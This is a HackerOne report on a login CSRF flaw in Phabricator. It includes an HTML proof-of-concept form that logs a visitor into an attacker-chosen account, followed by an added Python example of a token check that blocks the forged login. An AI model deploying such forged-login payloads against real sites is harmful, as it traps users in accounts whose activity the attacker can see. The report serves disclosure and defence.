Phabricator: Log in a user to another account

2014-01-23T12:54:26
ID H1:774
Type hackerone
Reporter dawidczagan
Modified 2014-02-22T22:21:32

Description

It is possible to log a user in to another account (no CSRF token). PoC (for demonstration purposes with a Submit button; normally sent automatically):

<html>
  <body>
    <form action="http://DOMAIN-WITH-PHABRICATOR/auth/login/password:self/" method="POST">
      <input type="hidden" name="__dialog__" value="1" />
      <input type="hidden" name="username" value="user3" />
      <input type="hidden" name="password" value="password3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The user needs to be logged out when the aforementioned request is submitted. It is assumed that user3 with password3 exists.
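
A server-side check that rejects a cross-site login POST like the one above, as an added example (not Phabricator's code or its actual fix): the login form carries a token bound to a cookie set before login, and credentials are only examined once that token verifies. The names `anon_id`, `csrf_token`, `handle_login` and the in-memory user store are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # assumption: per-deployment secret
_SALT = secrets.token_bytes(16)

def _kdf(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)

# Constructed user store holding the account named in the report's PoC.
USERS = {"user3": _kdf("password3")}

def new_anon_id() -> str:
    """Random value set as a cookie on first visit, before any login."""
    return secrets.token_urlsafe(16)

def issue_login_token(anon_id: str) -> str:
    """Token rendered into the login form, bound to the visitor's cookie."""
    return hmac.new(SERVER_KEY, anon_id.encode(), hashlib.sha256).hexdigest()

def token_is_valid(anon_id, token) -> bool:
    if not isinstance(anon_id, str) or not isinstance(token, str):
        return False
    expected = issue_login_token(anon_id)
    return hmac.compare_digest(expected.encode(), token.encode())

def handle_login(cookies: dict, form: dict) -> tuple:
    """Return (status, message); credentials are only checked after the token."""
    if not token_is_valid(cookies.get("anon_id"), form.get("csrf_token")):
        return 403, "missing or invalid login CSRF token"
    stored = USERS.get(form.get("username", ""))
    supplied = _kdf(form.get("password", ""))
    if stored is None or not hmac.compare_digest(stored, supplied):
        return 401, "bad credentials"
    return 200, "logged in as " + form["username"]

# Constructed request with the same fields as the report's PoC: no token.
POC_FORM = {"__dialog__": "1", "username": "user3", "password": "password3"}

if __name__ == "__main__":
    anon = new_anon_id()
    print(handle_login({"anon_id": anon}, POC_FORM))
    print(handle_login({"anon_id": anon},
                       {**POC_FORM, "csrf_token": issue_login_token(anon)}))
```

A page on another origin can neither read the visitor's cookie nor the token rendered into the real login form, so the forged form has nothing valid to submit.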